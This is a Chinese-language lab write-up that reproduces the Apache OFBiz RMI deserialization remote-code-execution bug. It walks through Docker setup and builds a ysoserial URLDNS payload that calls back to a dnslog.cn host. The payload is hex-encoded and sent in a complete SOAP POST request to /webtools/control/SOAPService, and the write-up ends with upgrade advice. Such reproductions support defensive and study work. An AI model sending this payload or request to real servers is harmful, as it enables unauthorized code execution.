0x00简介

Apache OFBiz全称是The ApacheOpen For Business Project。是开放的电子商务平台，是一个非常著名的开源项目，提供了创建基于最新的J2EE/XML规范和技术标准，构建大中型企业级、快平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz几乎实现了所有的J2EE核心设计模式，各个模块之间的耦合比较松散，用户能够比较容易的根据自己的需要进行拆卸，非常灵活。

0x01漏洞概述

2021年3月22日 Apache OFBiz官方发布安全更新，修复了一处由RMI反序列化造成的远程代码执行漏洞。攻击者可构造恶意请求，触发反序列化，从而造成任意代码执行，控制服务器。

0x02影响版本

Apache OFBiz < 17.12.06

0x03环境搭建

1、本次漏洞复现使用docker环境搭建，使用docker搜索ofbiz

docker search ofbiz

2、选择第二个，使用命令拉取环境

docker pull opensourceknight/ofbiz

3、拉取完毕后使用命令运行漏洞环境，使用ps查看是否启动成功

docker run -d -p 8080:8080 -p 8443:8443 opensourceknight/ofbiz

0x04漏洞复现

1、在GitHub上下载java反序列化利用工具ysoserial,

git clone https://github.com/frohoff/ysoserial.git

2、进入ysoserial目录使用maven下载编译需要得包，编译成功为以下图片

mvn clean package -DskipTests

3、在ysoserial目录可以看到有一个target目录，进入此目录

4、准备一个dnslog地址，使用以下命令生成编码保存到123.ot

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://w5voea.dnslog.cn >123.ot

5、使用python脚本转成hex

import binascii

filename = ‘123.ot’

with open(filename, ‘rb’) as f:

content = f.read()

print(binascii.hexlify(content))

6、在浏览器访问以下地址然后使用Burp抓包发送到重放模块

https://your-ip:8443/webtools/control/SOAPService

7、将GET改为POST在包内添加以下数据，将数据内cus-obj中的代码修改成自己生成的代码，把dnslog地址也换成自己的，修改完后发送

POST /webtools/control/SOAPService HTTP/1.1

Host: 172.16.1.146:8443

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/xml

Content-Length: 1023

<soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/”>

<soapenv:Header/>

<soapenv:Body>

<ser>

<map-HashMap>

<map-Entry>

<map-Key>

<cus-obj>aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff7400107735766f65612e646e736c6f672e636e74000071007e0005740004687474707078740017687474703a2f2f7735766f65612e646e736c6f672e636e78</cus-obj>

</map-Key>

<map-Value>

<std-String value=”http://w5voea.dnslog.cn”/>

</map-Value>

</map-Entry>

</map-HashMap>

</ser>

</soapenv:Body>

</soapenv:Envelope>

8、查看dnslog

9、在github上相关的利用脚本，这里就不做演示

0x05修复建议

1、升级到最新版本或安全版本

https://ofbiz.apache.org/download.html#vulnerabilities

参考地址: https://blog.csdn.net/xuandao_ahfengren/article/details/115163971

来源：freebuf.com 2021-04-08 14:24:26 by: 东塔安全学院